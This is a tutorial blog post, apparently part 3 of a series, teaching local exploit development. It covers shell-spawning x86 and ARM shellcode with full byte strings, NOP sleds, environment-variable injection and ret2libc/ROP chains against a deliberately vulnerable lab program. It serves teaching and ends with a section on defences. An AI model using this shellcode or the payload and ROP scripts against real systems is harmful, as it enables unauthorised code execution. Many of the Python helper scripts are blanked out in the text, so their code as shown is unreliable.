Introduction to exploit development - Part 3: Shellcode
Overview
In Part 2, we learned how stack-based buffer overflows enable control flow hijacking by corrupting saved return addresses. We demonstrated redirecting execution to existing functions in the target program. While interesting, this really is limiting, as we can only jump to code that already exists in the program.
The next step is shellcode: custom machine instructions injected into a vulnerable program's memory and executed to achieve arbitrary code execution. This post explores shellcode development for both x86 and ARM architectures, covering:
- Assembly fundamentals and system call interfaces
- Writing position-independent shellcode that spawns shells
- Eliminating null bytes that terminate string operations
- NOP sled technique for reliable exploitation
- Return-Oriented Programming (ROP) when the stack is non-executable
- Testing and debugging shellcode effectively
All x86 work below uses the Debian i386 VM, while ARM work uses the Debian armhf VM or Raspberry Pi configured in Part 1.
A bit or two of assembly
Before writing shellcode, we review basic assembly for both architectures by implementing a simple "Hello, World!" program that uses system calls directly.
x86 hello world
hello.s (x86 AT&T syntax):
.section .data
msg:
.ascii "Hello, World!\n"
msg_len = . - msg
.section .text
.globl _start
_start:
# write(1, msg, msg_len)
movl $4, %eax # syscall number for write
movl $1, %ebx # file descriptor 1 (stdout)
leal msg, %ecx # pointer to message
movl $msg_len, %edx # message length
int $0x80 # invoke syscall
# exit(0)
movl $1, %eax # syscall number for exit
xorl %ebx, %ebx # exit code 0
int $0x80 # invoke syscall
Assemble, link, and execute:
# Output: Hello, World!
Key concepts:
- System calls: On 32-bit x86 Linux, system calls are invoked via
int $0x80interrupt - Calling convention: Syscall number in
eax, arguments inebx,ecx,edx,esi,edi,ebp(in that order) - Return value: Returned in
eax
Reference: Linux x86 syscall table
ARM hello world
hello.s (ARM):
.section .data
msg:
.ascii "Hello, World!\n"
.set msg_len, . - msg
.section .text
.globl _start
_start:
# write(1, msg, msg_len)
mov r7, #4 @ syscall number for write
mov r0, #1 @ file descriptor 1 (stdout)
ldr r1, =msg @ pointer to message
ldr r2, =msg_len @ message length
svc #0 @ invoke syscall (supervisor call)
# exit(0)
mov r7, #1 @ syscall number for exit
mov r0, #0 @ exit code 0
svc #0 @ invoke syscall
Assemble, link, and execute:
# Output: Hello, World!
Key concepts:
- System calls: On ARM Linux, system calls are invoked via
svc #0(supervisor call, formerlyswi) - Calling convention: Syscall number in
r7, arguments inr0,r1,r2,r3,r4,r5,r6(in that order) - Return value: Returned in
r0
Reference: Linux ARM syscall table
These examples demonstrate the fundamental differences between x86 and ARM assembly and their system call interfaces, details we must account for when writing our shellcode in the following sections.
Testing shellcode
Before developing shellcode, we need a way to test it. Originally, I used a C program to help with this (based off of code from Hacking by Jon Erickson), but later created a more flexible Python script to speed things up. I've included both below:
C shellcode test harness
shellcode.c
// Replace with your shellcode bytes
unsigned char shellcode =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\xb0\x0b\xcd\x80";
int
Compile with executable stack:
This approach is simple but requires recompilation for each shellcode test. The executable stack flag (-z execstack) is required to allow code execution from the data segment where our shellcode array resides.
Python shellcode test harness
A more flexible approach is using Python's ctypes library to manipulate memory protection and execute shellcode directly. This is shown via the test_shellcode method in the shellcode.py script below. This script also includes some useful helper functions that we'll use later, you can ignore them for now.
shellcode.py
#!/usr/bin/env python3
"""
Convert a string or bytes object to little endian hex representation.
Example: string_to_little_endian_hex("/bin") -> 0x6e69622f
Args:
data: String or bytes to convert to hex
"""
# Encode string to bytes if needed
=
# Convert to hex and reverse byte order for little endian
=
=
"""
Extract shellcode opcodes from an assembled and linked executable.
IMPORTANT: Link your executable with the -N flag:
ld your_program.o -N -o your_program
Args:
executable_name: Name of the executable to extract opcodes from
bytes_only: If True, print only the hex bytes (compatible with test command)
"""
=
# Create binary file using objcopy
=
return
# Read binary data and format as shellcode
=
# Print hex bytes only (no 0x prefix, no \x separators)
# Print with length and \x format
=
# Clean up temporary file
"""
Create an executable function from shellcode bytes.
Marks memory pages as executable and returns a callable function pointer.
Args:
shellcode_bytes: Bytes object containing assembly opcodes
Returns:
Callable function that executes the shellcode
"""
# Create C buffer and cast to function pointer
=
=
# Get function address and libc instance
= .
=
=
# Calculate page-aligned starting address
= *
# Mark all pages containing shellcode as executable (READ|WRITE|EXEC)
assert == 0
return
=
=
=
=
This script uses mprotect() to mark the memory page containing our shellcode as executable, eliminating the need for -z execstack. This is more representative of real-world exploitation where we mark specific memory regions executable rather than the entire stack.
Writing shellcode: x86
Shellcode development follows a process:
- Identify the goal (e.g., spawn a shell)
- Determine required system calls
- Write assembly that achieves the goal
- Eliminate problematic bytes (null bytes, newlines, etc.)
- Extract opcodes and test
Our goal in this series will always be to spawn a /bin/sh shell using the execve() system call.
Understanding execve()
The execve() system call replaces the current process with a new program:
int ;
To spawn a shell:
pathname: pointer to string "/bin/sh"argv: array containing ["/bin/sh", NULL]envp: can be NULL
On x86:
- Syscall number: 11 (0xb)
- Arguments:
ebx= pathname,ecx= argv,edx= envp
First attempt: bad_shell.s (x86)
bad_shell.s
.data
shell: .ascii "/bin/shX"
.text
.global _start
_start:
### char *shell[] = {"/bin/sh", NULL}; ###
### execve("shell[0], shell, NULL); ###
mov $11, %eax # Store syscall for execve (11) in %eax
mov $shell, %ebx # Store string of executable we want to execute in %ebx
movb $0, 7(%ebx) # Overwrite the last byte (X) in %ebx to be NULL
mov $0, %ecx # Store NULL in %ecx
int $0x80 # Interrupt to make the syscall
### exit(0); ###
movl $1, %eax # Store syscall for exit (1) in %eax
movl $0, %ebx # Store the exit value we want to return in %ebx
int $0x80 # Interrupt to make the syscall
Assemble, link, and test:
# Should spawn a shell
This works, but let's examine the opcodes.
Using objdump:
# objdump -d bad_shell
)
Using shellcode.py:
# ./shellcode.py print bad_shell
\x
The disassembly reveals a whopping 16 null bytes (\x00). Null bytes terminate string operations in C (like strcpy(), gets(), etc.), preventing our shellcode from being fully copied into memory. They gotta go.
Eliminating null bytes: good_shell.s (x86)
To get rid of null bytes, we can apply some of the following techniques:
- XOR for zeroing: Instead of
mov $0, %eax, usexor %eax, %eax - Push strings onto stack: Instead of referencing the data segment, construct strings on the stack at runtime
- Clever arithmetic: Build values through arithmetic instead of direct assignment
Let's see an example of this:
good_shell.s
.text
.global _start
_start:
### execve("/bin/sh", ["/bin/sh", NULL], NULL); ###
xor %eax, %eax # XOR %eax with itself, zeroing it out
push %eax # Push %eax (NULL) onto the stack
push $0x68732f2f # Push "//sh" onto the stack
push $0x6e69622f # Push "/bin" onto the stack, %esp now points to it
mov %esp, %ebx # %ebx now holds the starting address of "/bin//sh"
push %eax # Push %eax (NULL) onto the stack
push %ebx # Push %ebx ("/bin//sh\0") onto the stack, %esp now points to it
mov %esp, %ecx # %ecx now holds starting address of ["/bin//sh", NULL]
xor %edx, %edx # XOR %edx with itself, zeroing it out
mov $11, %al # Store syscall for execve (11) in %eax, via %al
int $0x80 # Interrupt to make the syscall
### exit(0); ###
xor %eax, %eax # XOR %eax with itself, zeroing it out
mov $1, %al # Store syscall for exit (1) in %eax, via %al
xor %ebx, %ebx # Store the exit value we want to return in %ebx by XORing it to get 0
int $0x80 # Interrupt to make the syscall
Assemble:
Extract the opcodes and check for null bytes (again, you can use objdump, or the print option from the shellcode.py script given earlier):
As you'll see, no null bytes!
Final x86 shellcode (33 bytes):
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80
Test this shellcode using the Python shellcode.py script given earlier:
# Should spawn a shell
Writing shellcode: ARM
ARM has some obvious differences compared to x86, namely:
- Different instruction encoding and addressing modes
- Thumb mode (16-bit instructions) can reduce null bytes
- Branch instructions for mode switching
First attempt: bad_shell.s (ARM)
bad_shell.s
.syntax unified
.data
shell: .ascii "/bin/sh\0"
.text
.global _start
_start:
.code 32
@@@ execve("/bin/sh", 0, 0); @@@
ldr r0, shell_addr @ Load executable we want to execute in r0
mov r1, 0 @ Store NULL in r1
mov r2, 0 @ Store NULL in r2
mov r7, 11 @ Store the sycall for execve (11) in r7
swi 0 @ Software interrupt to make the syscall
@@@ exit(0); @@@
mov r0, 0 @ Store the exit value we want to return in r0
mov r7, 1 @ Store the sycall for exit (1) in r7
swi 0 @ Software interrupt to make the syscall
shell_addr:
.word shell
Assemble and test:
Check for null bytes:
\x
We find 14 null bytes. Time to get creative.
Eliminating null bytes: good_shell.s (ARM)
For better ARM shellcode, we'll apply several techniques (some of which are similar to what we did for x86):
- Switch to Thumb mode: Use 16-bit instructions to reduce null bytes
- Program-relative addressing: Used to load string addresses
- XOR for zeroing: Use
eor(exclusive OR) to zero registers instead of direct assignment - Writeable .text section: We'll store string data in the .text section and use relative addressing, however, note that this will require a writable text segment (via
-Nlinker flag) to test
good_shell.s
.section .text
.global _start
_start:
.code 32
add r3, pc, #1 @ Add 1 to PC register and add it to r3
bx r3 @ Branch and exchange to switch to Thumb mode (LSB = 1)
.code 16
@@@ execve("/bin/sh", NULL, NULL); @@@
add r0, pc, #8 @ Use program-relative adressing to load our string into r0
eor r1, r1, r1 @ XOR r1 with itself, zeroing it out
eor r2, r2, r2 @ XOR r2 with itself, zeroing it out
strb r2, [r0, #7] @ Overwrite the last byte of "/bin/shX" with 0 (NULL)
mov r7, #11 @ Store syscall for execve (11) in r7
svc #1 @ Interrupt to make a supervisor call
.ascii "/bin/shX"
Assemble with writable text section:
Extract the opcodes and check for null bytes
Final ARM shellcode (28 bytes):
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
Test this shellcode using the Python shellcode.py script given earlier:
# Should spawn a shell
Exploiting
Now that we have working shellcode, we face a problem: how do we actually get a vulnerable program to execute it? In Part 2, we exploited buffer overflows by redirecting the saved return address to existing functions. But now we want to inject our custom shellcode into memory and execute it.
The challenge is that we need to know the exact memory address where our shellcode resides. If we overwrite the return address with the wrong value, the program crashes instead of executing our shellcode. This is tricky because:
- Stack addresses vary based on environment variables, command-line arguments, and program state
- We rarely have perfect information about where our injected data ends up
- Even small miscalculations cause crashes instead of exploitation
The so-called NOP sled technique solves this problem by making exploitation more reliable when we don't know the exact address where our shellcode will land in memory.
NOP sleds
A NOP sled is a sequence of NOP (No Operation) instructions preceding our shellcode. When the program jumps into the NOP sled, execution "slides" through the NOPs until reaching our shellcode.
Why this helps: When exploiting real programs, we often don't know the exact stack address where our shellcode begins. Environment variables, command-line arguments, and ASLR (when enabled) affect stack layout. A large NOP sled means we only need to jump somewhere in the sled - any address within hundreds of bytes works.
NOP opcodes:
- x86:
\x90(one byte, simple) - ARM: More complex - ARM doesn't have single-byte NOPs. Common alternatives:
mov r1, r1(four bytes:\x01\x10\xa0\xe1)- Must be 4-byte aligned for ARM execution mode
Environment variable injection
Instead of injecting shellcode directly into the vulnerable buffer (which may be too small), we store shellcode in an environment variable and redirect execution to that address.
Export shellcode to environment:
Example on x86:
This creates an environment variable with 1000 NOP instructions followed by our shellcode.
Now we need the memory address of this environment variable, one way to get this is to use the following helper program (credit goes to Hacking by Jon Erickson):
getenv_addr.c
int
Compile and use:
# Output: SHELLCODE is at address: 0xbeffef55 (example address)
Important: The address will vary slightly between programs due to environment differences. For exploitation, we can just estimate an address in the middle of our NOP sled.
Creating a payload generator
Rather than manually crafting payloads with inline Python, let's use a helper script that consolidates our exploit primitives. The nop.py script given below provides three subcommands:
shellcode: Generate a NOP sled followed by architecture-specific shellcodebuffer: Generate a buffer filled with an environment variable's address (for overwriting return addresses)debug: Generate an alphabetic pattern for identifying offsets
nop.py
#!/usr/bin/env python3
=
=
"""Convert a hex string to little endian bytes."""
=
return
"""
Print a buffer containing the address of an environment variable.
The function accounts for the difference in program name length between
this script and the target executable, then adds an offset to land inside
the NOP sled rather than at its start.
"""
=
=
=
=
# Program name affects env var memory location - each extra character
# shifts the address. Calculate the difference between this script's
# invocation name and the target program name.
=
= -
# Each character difference shifts the address by 1 byte on the stack.
# Add 500 to land in the middle of a typical 1000-byte NOP sled.
= - + 500
= f
"""Print a warning if NOP sled size is less than 1000 bytes."""
"""
Print a buffer with repeating alphabet characters (AAAABBBBCCCC...).
If the given buf_size is larger than 104 (26 * 4), then the entire
returned buffer is prepended by (buf_size - 104) '@' (ASCII 0x40) characters.
"""
=
"""Print a NOP sled followed by shellcode."""
= b *
=
# ARM NOP instruction (mov r1, r1)
= b *
=
=
=
=
=
=
=
An interesting thing to take note of is the fancy footwork in print_env_buffer(). Environment variable addresses shift based on the program name length, so this script compensates for this difference and adds an offset to land in the middle of the NOP sled rather than guessing manually.
Exploiting victim.c using NOP sleds
Consider a simple vulnerable program:
victim.c
void
int
Compile:
# x86
# ARM
Now, to actually start exploiting we can follow a general set of steps:
- Export NOP sled + shellcode to an environment variable
- Determine or guess the exploitable buffer (padding) length
- Create the injection payload, including the padding to overwrite the return address + address pointing to NOP sled
- Execute victim with payload
For ARM, there are a few extra considerations to make, as discussed in the next section. But for now, let's focus on x86.
First, determine the padding needed to reach the saved return address. The debug subcommand generates an alphabetic pattern (@@@@@@AAAABBBBCCCC...) that helps identify exact offsets:
# eip 0x58585858 0x58585858
The value 0x58585858 is ASCII for "XXXX", meaning EIP was overwritten by the X's in this case. Since the pattern repeats each letter 4 times (AAAA=0, BBBB=4, ..., XXXX=92), and 16 (120 - 104) @'s prepended because we specified a buffer size of 120, we need 16 + 92 = 108 bytes to reach and overwrite the return address. Note, since we want the last 4 bytes to be the address into our NOP sled, our padding should be 104 bytes.
Now export our shellcode with a 1000-byte NOP sled:
Finally, exploit the vulnerable program. The buffer subcommand generates a buffer filled with the calculated address of our environment variable:
# Should spawn a shell
Victim has been pwned!! But wait, what just happened?
The buffer subcommand did the following:
- Looked up the
SHELLCODEenvironment variable address - Adjusted for the program name length difference between
nop.pyand./victim - Added an offset to land inside the NOP sled (not at the exact start)
- Generated 240 bytes of this address repeated
- Note how this buffer is much bigger than our precise finding of 108 bytes! That whole process of using GDB to find the exact buffer/padding length was just for fun, we didn't actually need such precision (because our buffer just repeated the target address repeatedly)
When executed, the overwritten return address points into our NOP sled in the environment variable. Execution slides through NOPs and hits our shellcode, spawning a shell.
ARM NOP sled alignment complications
ARM NOP sleds must be handled a bit differently due to:
- 4-byte alignment requirement: ARM instructions must be 4-byte aligned in ARM mode
- Multi-byte NOP instructions: No single-byte NOP exists
- Address alignment: The environment variable address must also be 4-byte aligned (divisible by 4)
Using nop.py for ARM:
Use nop.py to generate an appropriate ARM NOP sled using the --arch arm flag and store it in an env variable:
This generates 1000 bytes of ARM NOP instructions (mov r1, r1 - encoded as \x01\x10\xa0\xe1) followed by the ARM shellcode. Note that the NOP sled size should be divisible by 4 since each ARM NOP is 4 bytes.
Critical alignment issue: The environment variable address must be 4-byte aligned (divisible by 4). Use getenv_addr to check:
# Output: 0xbefffd3a (example - NOT divisible by 4)
If the address is NOT divisible by 4, export additional environment variables to shift addresses:
# Output: 0xbefffd3c (NOW divisible by 4!)
This manipulation shifts environment variable addresses until alignment is achieved. Only then can we successfully exploit ARM targets with NOP sleds.
Once aligned, exploit as before:
Note, that the environment variable addresses will be different inside victim commpared to your shell. If you run into BUS ERROR or segmentation errors, try adding additional A's to your DUMMY environment variable and retrying, it'll work after a few retries - trust me!
Return-Oriented Programming (ROP)
NOP sleds require an executable stack (-z execstack compiler flag). Modern systems enable the NX (No-eXecute) bit by default, marking the stack as non-executable. When we attempt to execute shellcode from the stack, the program crashes with a segmentation fault.
Return-Oriented Programming (ROP) bypasses this protection by reusing existing executable code in the program and linked libraries. Instead of injecting new code, we chain together short instruction sequences (called gadgets) ending in ret instructions, controlling the sequence via stack manipulation.
ROP fundamentals
The basic idea:
- Overwrite saved return addresses with an address of a gadget in executable memory (like libc)
- The gadget then executes and returns (via
ret) to the next address on the stack - We control the stack, so we control the sequence of gadgets executed
- Chain gadgets to achieve desired behavior (e.g., calling
system("/bin/sh"))
For Linux exploitation, this is often called ret2libc (return-to-libc) when specifically targeting libc functions.
ret2libc on x86
Instead of executing shellcode, we call system("/bin/sh") from libc. The system() function executes shell commands, so passing "/bin/sh" spawns a shell.
Required elements:
- Address of
system()in libc - Address of
exit()in libc (for clean exit after shell exits) - Address of string "/bin/sh" (can be in an environment variable, but it also conveniently exists in libc itself)
Stack layout for ret2libc:
[padding to overflow]
[address of system()]
[address of exit()]
[address of "/bin/sh" string]
When the vulnerable function returns:
- Pops
system()address into EIP, begins executingsystem() system()reads its return address (seesexit()) and argument (sees"/bin/sh")system("/bin/sh")executes, spawning a shell- When shell exits, execution continues to
exit(), cleanly terminating
Finding addresses manually with GDB:
()
()
()
# $1 = {<text variable, no debug info>} 0xb7de2920 <system>
()
# $2 = {<text variable, no debug info>} 0xb7dd1d60 <exit>
()
For the "/bin/sh" string, we can find it directly in libc rather than using an environment variable:
# Find libc path
|
# libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7d96000)
# Search for "/bin/sh" string in libc
# 1234567:/bin/sh
The string offset plus the libc base address gives us the runtime address.
Creating a manual exploit:
#!/usr/bin/env python3
# Addresses from GDB
= 0xb7de2920
= 0xb7dd1d60
= 0xb7e12345 # libc base + "/bin/sh" offset
# Build payload
= b * 112 # Padding to reach return address
=
+=
+=
= +
Automating ret2libc with rop.py
Manually finding all these addresses is tedious. Instead, let's create a script to automates the entire process:
rop.py
#!/usr/bin/env python3
"""Convert integer to 4-byte little-endian."""
return
"""Get libc path and runtime base address."""
# Find libc path
=
=
# Get symbol offsets from libc
=
=
=
# Get runtime address via GDB to calculate base
=
=
= -
# Find /bin/sh string offset
=
return
"""
x86 ret2libc: arguments on stack.
Stack after overflow: [system][exit][&"/bin/sh"]
"""
return + +
pass # Implemented later in the post
=
=
=
=
=
This script performs a handful of handy things:
- Finds libc path: Uses
lddto locate the linked libc library - Extracts symbol offsets: Uses
nm -Dto getsystem()andexit()offsets from libc - Calculates runtime base: Runs GDB to get the actual
system()address at runtime, then subtracts the offset to find the libc base address - Locates "/bin/sh": Uses
grep -boato find the string offset within libc - Builds the ROP chain: Constructs the payload with proper little-endian addresses
- Bruteforces padding: Tries different buffer sizes to find the correct overflow offset
Using rop.py for x86:
First compile the target without the executable stack flag:
Then run the exploit:
The script will try padding lengths from 100 to 130 bytes. When it hits the correct offset, you'll get a shell - without ever executing code from the stack! Not really practical for real hacking, but definitely a time saver!
ret2libc on ARM
ARM ret2libc is significantly more complex because arguments are passed in registers (r0, r1, r2, etc.), not on the stack like x86.
We can't simply overflow with function addresses and arguments. We need ROP gadgets that:
- Pop values from the stack into registers
- Then jump to our target function
The POP instruction as a gadget:
At first glance, POP seems uninteresting. But consider what pop {r0, r4, pc} actually does:
ldr r0, [sp], #4 ; load from stack into r0, increment sp
ldr r4, [sp], #4 ; load from stack into r4, increment sp
ldr pc, [sp], #4 ; load from stack into pc, increment sp
This loads values from the stack into registers - exactly what we need! If we overflow the stack with:
| Gadget address | r0 | r4 | pc |
|---|---|---|---|
pop {r0, r4, pc} | "/bin/sh" | dummy | system() |
The gadget will pop our controlled values into registers, with r0 containing our argument and pc jumping to system().
Finding gadgets in libc:
We need a gadget containing both r0 (first argument) and pc (jump target), without sp (which would corrupt our stack):
# Dump libc and search for useful POP patterns
|
Or use tools like ROPgadget:
|
# Example output: 0x00018084 : pop {r0, r4, pc}
Thumb mode considerations:
As mentioned before, ARM processors can operate in ARM mode (32-bit instructions) or Thumb mode (16-bit instructions). When jumping to Thumb code, the least significant bit (LSB) of the address must be set to 1. Below I provide updates to the rop.py script shown earlier, and make sure it handles this automatically for system() and exit() addresses.
Extending rop.py for ARM:
The full rop.py script includes ARM support with automatic gadget finding:
"""Find 'pop {r0, ..., pc}' gadget in libc."""
=
=
, =
=
# Need r0 and pc, must not have sp (corrupts stack)
# Prefer smallest gadget (fewer dummy values needed)
, =
return + ,
"""
ARM ret2libc: arguments in registers via ROP gadget.
Chain: [gadget][values to pop into registers...]
"""
, =
=
+=
+= # Thumb bit
+= # Thumb bit
+= b # Dummy for other regs
return
The find_arm_gadget() function:
- Disassembles libc using
objdump - Searches for all
pop {...}instructions - Filters for gadgets containing
r0andpcbut notsp - Selects the smallest gadget (minimizes dummy values needed)
The build_arm_chain() function:
- Finds a suitable gadget
- Builds the chain by iterating through the registers in the gadget
- Places appropriate values for each register (
/bin/shforr0,system()forpc) - Sets the LSB for Thumb mode addresses
- Fills unused registers with dummy values
Using rop.py for ARM:
When executed:
- Overflow overwrites return address with gadget address
- Function returns to gadget
- Gadget pops
/bin/shaddress intor0, dummy values into other registers,system()address intopc - Execution jumps to
system()withr0="/bin/sh" - Shell spawns!
ARM ROP is a bit of a pain in the ass due to its register-based calling convention, but at least we now have some basic automation for it.
Defensive perspective
You now understand how to exploit binaries, at least at a basic level. Modern exploitation typically uses ROP or variants (JOP, SROP) because executable stacks are rare in production systems. However, understanding NOP sleds is pedagogically valuable and still relevant for embedded systems or legacy software.
Understanding exploitation techniques also greatly informs you how to defend against such attacks, for example, things you now know are:
- Bounds checking: Always use safe string functions (
strncpy,fgets,snprintf) - Stack canaries: Modenr compilers insert random values before return addresses; corruption is then detected before return
- DEP/NX bit: Marks the stack and heap as non-executable
- ASLR: Randomizes memory layout to make addresses unpredictable
Additionally, some other things we haven't explicitly covered are:
- CFI (Control Flow Integrity): Ensures program control flow matches intended behavior
- Static analysis: Tools like
clang-tidy,cppcheckdetect unsafe function usage - Fuzzing: Automated testing with malformed inputs to discover vulnerabilities
Although we haven't seen much of these ourselves, you'll find a ton of literature on these topics if you look them up.
Keep in mind though, no single mitigation is perfect. Hackers are surprisingly crafty and sometimes heavily funded and well-eqquiped (think nation states). Defense in depth (multiple layers) is always critical.
If you want to learn more about security and the fundamental principles, I would highly recommend Computer Security and the Internet: Tools and Jewels by Paul C. van Oorschot.
Next steps
If you made it to the end of this posts, congrats! We covered a lot of information; we explored shellcode development and two exploitation techniques (NOP sleds and ROP) for both x86 and ARM, we even developed some swanky Python scripts to automate some of these processes. In Part 4, we'll shift focus to heap-based vulnerabilities on ARM (and only ARM, because x86 is meh). Onwards!
References
- The Shellcoder's Handbook - Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte
- Hacking: The Art of Exploitation (2nd Edition) - Jon Erickson
- Linux Syscall Reference
- X86 Assembly/Interfacing with Linux - Wikibooks
- Intel 64 and IA-32 Architectures Software Developer's Manual
- Azeria Labs: ARM Assembly Basics
- Exploit Database: x86 execve shellcode
- Exploit Database: ARM execve shellcode
- A Short Guide on ARM Exploitation - Aditya Gupta
- ARM shellcode and exploit development - Andrea Sindoni (BSides Munich 2018)
- Python ctypes documentation
- Computer Security and the Internet: Tools and Jewels - Paul C. van Oorschot